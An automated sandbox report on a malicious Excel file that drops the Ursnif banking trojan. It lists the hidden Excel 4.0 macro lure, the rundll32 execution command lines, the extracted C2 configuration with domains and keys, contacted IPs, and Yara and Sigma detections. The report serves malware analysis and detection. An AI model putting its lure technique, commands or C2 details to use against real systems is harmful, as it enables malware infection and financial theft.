Play interactive tour

Edit tour

Analysis Report document-1370071295.xls

Overview

General Information

Sample Name:	document-1370071295.xls
Analysis ID:	381642
MD5:	09d41d14738707c2ce1e28b2313e1e5c
SHA1:	5714bc70d7d24c3db8c939c89fcea4b1d62736df
SHA256:	4844dc6311611acbba6d5afd762bcee79e3b4a5cc0d3d89b0ddc9c486f7b8d5e
Tags:	IcedIDxls
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0 Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (drops PE files)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Ursnif

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Found obfuscated Excel 4.0 Macro

Machine Learning detection for dropped file

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Writes registry values via WMI

Yara detected hidden Macro 4.0 in Excel

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document contains embedded VBA macros

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Uses code obfuscation techniques (call, push, ret)

Yara detected Xls With Macro 4.0

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2004 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

rundll32.exe (PID: 2292 cmdline: rundll32 ..\fikftkm.thj,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2396 cmdline: rundll32 ..\fikftkm.thj1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2748 cmdline: rundll32 ..\fikftkm.thj2,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2764 cmdline: rundll32 ..\fikftkm.thj2,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2852 cmdline: rundll32 ..\fikftkm.thj3,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2968 cmdline: rundll32 ..\fikftkm.thj4,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

iexplore.exe (PID: 2824 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 4EB098135821348270F27157F7A84E65)

iexplore.exe (PID: 2528 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2824 CREDAT:275457 /prefetch:2 MD5: 8A590F790A98F3D77399BE457E01386A)

iexplore.exe (PID: 3004 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 4EB098135821348270F27157F7A84E65)

iexplore.exe (PID: 3064 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3004 CREDAT:275457 /prefetch:2 MD5: 8A590F790A98F3D77399BE457E01386A)

cleanup

Malware Configuration

Threatname: Ursnif

[{"RSA Public Key": "Om1HeBhXBR6NHvmWFG5B2kyl5mdcRMsb8ux2uo9VgGW0O2LzHZKk3w9bxw9stgphU0ayytcOYkK6GCNJlKSeMTZJ5WPgZiX+MaXiUccStEUTXkW1ubp0gdr16sb5U4M+rzWWPvc3s7bj9o1yqSJtP7PmMVp7E+3llLULQ9/DZbAD7SXaft6wcY8wFjSkI+8D"}, {"c2_domain": ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"], "botnet": "5566", "server": "12", "serpent_key": "10301029JSJUYDWG", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
document-1370071295.xls	SUSP_EnableContent_String_Gen	Detects suspicious string that asks to enable active content in Office Doc	Florian Roth	0x1ed97:$e1: Enable Editing 0x1edb6:$e2: Enable Content
document-1370071295.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x2aaa2:$s1: Excel 0x2bb0b:$s1: Excel 0x3b3c:$Auto_Open1: 18 00 17 00 AA 03 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1370071295.xls	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security
document-1370071295.xls	JoeSecurity_HiddenMacro	Yara detected hidden Macro 4.0 in Excel	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000006.00000003.2495224017.00000000030CD000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000006.00000002.2504044164.0000000000170000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000006.00000003.2357108464.00000000031CB000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 2764	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.rundll32.exe.170000.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
6.2.rundll32.exe.10000000.10.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\fikftkm.thj,DllRegisterServer, CommandLine: rundll32 ..\fikftkm.thj,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2004, ProcessCommandLine: rundll32 ..\fikftkm.thj,DllRegisterServer, ProcessId: 2292

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 6.2.rundll32.exe.2e39590.9.raw.unpack

Malware Configuration Extractor: Ursnif [{"RSA Public Key": "Om1HeBhXBR6NHvmWFG5B2kyl5mdcRMsb8ux2uo9VgGW0O2LzHZKk3w9bxw9stgphU0ayytcOYkK6GCNJlKSeMTZJ5WPgZiX+MaXiUccStEUTXkW1ubp0gdr16sb5U4M+rzWWPvc3s7bj9o1yqSJtP7PmMVp7E+3llLULQ9/DZbAD7SXaft6wcY8wFjSkI+8D"}, {"c2_domain": ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"], "botnet": "5566", "server": "12", "serpent_key": "10301029JSJUYDWG", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]

Multi AV Scanner detection for domain / URL

Show sources

Source: accesslinksgroup.com

Virustotal: Detection: 8%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: document-1370071295.xls	Virustotal: Detection: 16%	Perma Link
Source: document-1370071295.xls	Metadefender: Detection: 18%	Perma Link
Source: document-1370071295.xls	ReversingLabs: Detection: 48%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\fikftkm.thj2	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif	Joe Sandbox ML: detected

Source: 6.2.rundll32.exe.2a0000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 6.2.rundll32.exe.10000000.10.unpack	Avira: Label: TR/Crypt.XPACK.Gen8

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 207.174.213.126:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.62.4:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.129.4:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.22:49173 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.50.218.68:443 -> 192.168.2.22:49174 version: TLS 1.2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 6_2_001C12D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

6_2_001C12D4

Software Vulnerabilities:

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: 0104[1].gif.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Source: Joe Sandbox View	IP Address: 207.174.213.126 207.174.213.126
Source: Joe Sandbox View	IP Address: 162.241.62.4 162.241.62.4

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ

Jump to behavior

Source: rundll32.exe, 00000003.00000002.2108057689.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102163408.0000000001D30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2504193532.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504502612.00000000020F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2173123549.0000000001C10000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: vts.us.com

Source: rundll32.exe, 00000003.00000002.2108057689.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102163408.0000000001D30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2504193532.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504502612.00000000020F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2173123549.0000000001C10000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2108057689.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102163408.0000000001D30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2504193532.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504502612.00000000020F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2173123549.0000000001C10000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2108249236.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102325978.0000000001F17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2504417204.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504688386.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2173362712.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2167173953.0000000001CC7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2108249236.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102325978.0000000001F17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2504417204.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504688386.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2173362712.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2167173953.0000000001CC7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2108249236.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102325978.0000000001F17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2504417204.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504688386.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2173362712.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2167173953.0000000001CC7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000006.00000002.2504310287.00000000004CD000.00000004.00000020.sdmp	String found in binary or memory: http://under17.com
Source: rundll32.exe, 00000006.00000002.2504310287.00000000004CD000.00000004.00000020.sdmp	String found in binary or memory: http://under17.com/joomla/W8irzuIA03OC/DHBetYa3Vzl/hddQ_2FkuTZ0IV/Oq1yvMr7E_2Frfr6f90DE/Wv_2B_2Bqw4C
Source: rundll32.exe, 00000003.00000002.2108249236.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102325978.0000000001F17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2504417204.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504688386.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2173362712.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2167173953.0000000001CC7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2108057689.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102163408.0000000001D30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2504193532.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504502612.00000000020F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2173123549.0000000001C10000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2108249236.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102325978.0000000001F17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2504417204.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504688386.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2173362712.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2167173953.0000000001CC7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2108057689.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102163408.0000000001D30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2504193532.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2504502612.00000000020F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2173123549.0000000001C10000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000009.00000002.2166965953.0000000001AE0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443

Source: unknown	HTTPS traffic detected: 207.174.213.126:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.62.4:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.129.4:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.22:49173 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.50.218.68:443 -> 192.168.2.22:49174 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000006.00000002.2504044164.0000000000170000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 6.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.10000000.10.unpack, type: UNPACKEDPE

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000006.00000003.2495224017.00000000030CD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2357108464.00000000031CB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2764, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000006.00000002.2504044164.0000000000170000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 6.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.10000000.10.unpack, type: UNPACKEDPE

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000006.00000003.2495224017.00000000030CD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2357108464.00000000031CB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2764, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please elk 14 Ru
Source: Screenshot number: 8	Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please clic 14 R
Source: Screenshot number: 12	Screenshot OCR: Enable Editing, please click Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18
Source: Screenshot number: 12	Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Source: Document image extraction number: 9	Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 9	Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 15	Screenshot OCR: Enable Editing from the yellow bar above CB Once You have Enable Editing, please click Enable Cont
Source: Document image extraction number: 15	Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
Source: Screenshot number: 16	Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
Source: Screenshot number: 16	Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: document-1370071295.xls	Initial sample: CALL
Source: document-1370071295.xls	Initial sample: EXEC

Found abnormal large hidden Excel 4.0 Macro sheet

Show sources

Source: document-1370071295.xls	Initial sample: Sheet size: 4081
Source: document-1370071295.xls	Initial sample: Sheet size: 12790

Found obfuscated Excel 4.0 Macro

Show sources

Source: document-1370071295.xls

Initial sample: High usage of CHAR() function: 40

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\fikftkm.thj2			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif			Jump to dropped file

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10001D9F NtMapViewOfSection,	6_2_10001D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10001EB5 GetProcAddress,NtCreateSection,memset,	6_2_10001EB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10002375 NtQueryVirtualMemory,	6_2_10002375
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001C83B7 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	6_2_001C83B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001CB341 NtQueryVirtualMemory,	6_2_001CB341

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A348F	6_2_002A348F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A6424	6_2_002A6424
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A1000	6_2_002A1000
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A1918	6_2_002A1918
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A3314	6_2_002A3314
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A596E	6_2_002A596E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A237B	6_2_002A237B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A247B	6_2_002A247B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A5C76	6_2_002A5C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A1374	6_2_002A1374
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A554B	6_2_002A554B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A4859	6_2_002A4859
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A3FA8	6_2_002A3FA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A3A85	6_2_002A3A85
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A1B95	6_2_002A1B95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A28EB	6_2_002A28EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A20EE	6_2_002A20EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A52EC	6_2_002A52EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A5AF6	6_2_002A5AF6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_002A3BDB	6_2_002A3BDB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10002154	6_2_10002154
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001C4094	6_2_001C4094
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001CB11C	6_2_001CB11C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001C97F2	6_2_001C97F2

Source: document-1370071295.xls

OLE indicator, VBA macros: true

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif A05711289E9F8DBA5F0CE5FE3B3096F8C181F537D169997E2DB30F83036052D3
Source: Joe Sandbox View	Dropped File: C:\Users\user\fikftkm.thj2 A05711289E9F8DBA5F0CE5FE3B3096F8C181F537D169997E2DB30F83036052D3

Source: document-1370071295.xls, type: SAMPLE	Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: document-1370071295.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@19/59@7/6

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 6_2_001C757F CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

6_2_001C757F

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 6_2_001C7B5D SetWaitableTimer,CoCreateInstance,CoSetProxyBlanket,

6_2_001C7B5D

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\19CE0000

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC1D8.tmp

Jump to behavior

Source: document-1370071295.xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj,DllRegisterServer

Source: document-1370071295.xls	Virustotal: Detection: 16%
Source: document-1370071295.xls	Metadefender: Detection: 18%
Source: document-1370071295.xls	ReversingLabs: Detection: 48%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj3,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj4,DllRegisterServer
Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2824 CREDAT:275457 /prefetch:2
Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3004 CREDAT:275457 /prefetch:2
